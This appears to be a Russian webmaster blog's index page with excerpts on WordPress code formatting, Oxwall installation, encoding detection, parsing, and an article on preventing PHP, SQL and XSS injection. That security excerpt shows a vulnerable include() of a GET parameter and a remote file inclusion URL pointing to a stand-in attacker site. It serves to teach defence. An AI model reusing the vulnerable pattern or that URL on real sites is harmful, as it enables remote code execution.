Web МастерскаяБлог
Сообщество Web Мастеров. Тут собрано всё, чтобы написать свой первый сайт, запустить его в Интернет и поддерживать его в течении всей его работы.
Как вставить код в статью WordPress (PHP|CSS|JS|...)
Не давно мне задали вопрос как вставить код в статью, движок WordPress (PHP|CSS|JS|...). Постараюсь ответить понятным языком.
Дело в том, что движок неправильно обрабатывает код вставленный в пост и есть большая вероятность, что код отобразится совершенно неправильно, возможно, что HTML код обработается как часть страницы, а не как текст. Приведу пример, я вставляю в запись следующий код (взятый из движка WP):
На экране получим такую картину:
Как видите часть кода:
...
Дело в том, что движок неправильно обрабатывает код вставленный в пост и есть большая вероятность, что код отобразится совершенно неправильно, возможно, что HTML код обработается как часть страницы, а не как текст. Приведу пример, я вставляю в запись следующий код (взятый из движка WP):
if ( ( ! $errors->get_error_code() ) && isset( $_POST['pass1'] ) && !empty( $_POST['pass1'] ) ) {
reset_password($user, $_POST['pass1']);
setcookie( $rp_cookie, ' ', time() - YEAR_IN_SECONDS, $rp_path, COOKIE_DOMAIN, is_ssl(), true );
login_header( __( 'Password Reset' ), '<p class="message reset-pass">' . __( 'Your password has been reset.' ) . ' <a href="' . esc_url( wp_login_url() ) . '">' . __( 'Log in' ) . '</a></p>' );
login_footer();
exit;
}На экране получим такую картину:
Как видите часть кода:
<p class="message- Жалоба
Как установить движок Oxwall
Краткая инструкция, как установить сайт на движке Oxwall.
И так. Переходим на официальный сайт и скачиваем архив с файлами движка, качать тут: https://developers.oxwall.com/download.
Загружаем файлы из скаченного архива на сервер. Затем переходим по адресу: site/install/site или на главную, вас перенаправит на страницу установки движка, автоматически. Тут заполняем все поля и жмем кнопку Continue:
Если все поля заполнены правильно, на следующей странице необходимо указать данные базы данных и прификс таблиц (по умолчанию ow_). На следующей странице вам будет предложено установить крон на выполнение сценария ow_cron/run.php, данный пункт можно пропустить и переходить дальше, но сделать это все ровно придется.
Переходим на новую страницу, тут предложено войти на сайт или в админ панель.
Готово....
И так. Переходим на официальный сайт и скачиваем архив с файлами движка, качать тут: https://developers.oxwall.com/download.
Загружаем файлы из скаченного архива на сервер. Затем переходим по адресу: site/install/site или на главную, вас перенаправит на страницу установки движка, автоматически. Тут заполняем все поля и жмем кнопку Continue:
Если все поля заполнены правильно, на следующей странице необходимо указать данные базы данных и прификс таблиц (по умолчанию ow_). На следующей странице вам будет предложено установить крон на выполнение сценария ow_cron/run.php, данный пункт можно пропустить и переходить дальше, но сделать это все ровно придется.
Переходим на новую страницу, тут предложено войти на сайт или в админ панель.
Готово....
Как определить кодировку файла
Есть много способов, которыми можно закодировать сообщение. При этом буквы преобразуются в различные символы. Но иногда, при заходе на веб-сайт, вы вместо привычных букв видите непонятные символы. Сегодня мы поговорим о способах определения кодировки файла.
Сделать это можно с помощью онлайн-декодера. Главным образом он служит для распознавания электронных писем. После того, как вы открыли декодер, скопируйте нужный вам текст в буфер обмена. Далее вставляет текст в поле декодера и нажимаем «расшифровать», после чего в поле должен появиться расшифрованный текст, а ниже исходная кодировка и кодировка, в которую был перекодирован текст.
Декодировать текст можно с помощью специальной программы, например, Tcode. Можете воспользоваться функцией «открыть файл» или вставить текст из кодированного файла. Нажимаем «перекодировать» и текст должен будет преобразоваться в нужную кодировку. В строке состояния будет показана исходная кодировка. Там же можно посмотреть процент распознания символов.
Пос...
Сделать это можно с помощью онлайн-декодера. Главным образом он служит для распознавания электронных писем. После того, как вы открыли декодер, скопируйте нужный вам текст в буфер обмена. Далее вставляет текст в поле декодера и нажимаем «расшифровать», после чего в поле должен появиться расшифрованный текст, а ниже исходная кодировка и кодировка, в которую был перекодирован текст.
Декодировать текст можно с помощью специальной программы, например, Tcode. Можете воспользоваться функцией «открыть файл» или вставить текст из кодированного файла. Нажимаем «перекодировать» и текст должен будет преобразоваться в нужную кодировку. В строке состояния будет показана исходная кодировка. Там же можно посмотреть процент распознания символов.
Пос...
Как предотвратить PHP, SQL и XSS инъекции (Безопасность)
Я конечно не супер-профессионал по безопасности, но некоторые познания в области безопасности php скриптов есть. Итак, часто встречающиеся дыры в php скриптах:
- PHP инъекция.
- SQL инъекция.
- XSS.
Вот про борьбу с этими уязвимостями и пойдёт речь. Статей по безопасности конечно уйма, но всё же, внесу и свою лепту.
Что же это такое PHP-инъекция?
PHP-инъекция - способ взлома сайта путём выполнения на сайте стороннего PHP кода. Например, вы хотите подключить необходимый файл, в зависимости от параметра, пришедшего из GET:
Если ввести такой URL:
- PHP инъекция.
- SQL инъекция.
- XSS.
Вот про борьбу с этими уязвимостями и пойдёт речь. Статей по безопасности конечно уйма, но всё же, внесу и свою лепту.
Что же это такое PHP-инъекция?
PHP-инъекция - способ взлома сайта путём выполнения на сайте стороннего PHP кода. Например, вы хотите подключить необходимый файл, в зависимости от параметра, пришедшего из GET:
# Получаем имя файла
$action = isset($_GET['action']) ? $_GET['action'] : null;
# Тут какие-то действия
# ...
# Подключаем файл
include($action);Если ввести такой URL:
http://ваш_сайт/ваш_файл.php?action=http://сайт_взломщика/файл то, если в файле php.ini на вашем сервере включена директива allow_url_include, злоумышленник может внести код, который хочет выполнить на вашем сайте, в тот файл, на который он указал ссылку и код успешно выполнится на вашем сайте....Быстрое копирование информации с Web-страницы (Парсинг на PHP)
Заметил, что на форумах часто задают вопросы про парсинг сайтов. Решил написать небольшую статью, в которой попытаюсь объяснить азы парсинга и привести некоторые примеры работы с ним.
Итак, начнём с самого начала.
Что такое парсинг? Это слово является переведенным, а вернее просто написанным на кириллице (как это часто встречается в интернете) словом из английского языка "parsing". Оно переводится с английского как "разбор". Т.е. парсинг - это анализ и разбор какой-либо web-страницы с целью получения информации, содержащейся на ней.
Можно подумать: а зачем вообще нужно получать информацию с web-страницы таким способом? Приведу пример: допустим, Вам нужна база данных MySQL с марками и моделями автомобилей (недавно как раз мне пришлось писать парсер именно для этого). Как Вам её получить? Есть два варианта. Первый - это купить такую базу у человека, у которого она есть. Второй - составить её самому.
Если Вас устраивает первый вариант - Вы, не тратя время, покупаете её и всё. Вот так...
Итак, начнём с самого начала.
Что такое парсинг? Это слово является переведенным, а вернее просто написанным на кириллице (как это часто встречается в интернете) словом из английского языка "parsing". Оно переводится с английского как "разбор". Т.е. парсинг - это анализ и разбор какой-либо web-страницы с целью получения информации, содержащейся на ней.
Можно подумать: а зачем вообще нужно получать информацию с web-страницы таким способом? Приведу пример: допустим, Вам нужна база данных MySQL с марками и моделями автомобилей (недавно как раз мне пришлось писать парсер именно для этого). Как Вам её получить? Есть два варианта. Первый - это купить такую базу у человека, у которого она есть. Второй - составить её самому.
Если Вас устраивает первый вариант - Вы, не тратя время, покупаете её и всё. Вот так...
Категории
- Apache 6
- CMS 3
- CSS 16
- FTP 1
- HTML 11
- JavaScript 43
- MySQL 17
- Nginx 16
- PHP 52
- phpMyAdmin 2
- SVG 3
- URL 1
- XML 3
- Безопасность 7
- Библиотека JS 16
- Графика 3
- Доменное имя 1
- Инструкция 1
- Кодировка 2
- Контент 8
- Мнение 1
- Мобильное устройство 1
- Монетизация сайта 2
- Настройка 3
- Оптимизация 2
- Ошибка 11
- Поисковая система 1
- Продвижение сайта 6
- Производительность 1
- Софт 1
- Старт 2
- Сценарий 1
- Функция 1
- Хостинг | Сервер 3
Реклама
Сообщество DANFA · Русский (RU)
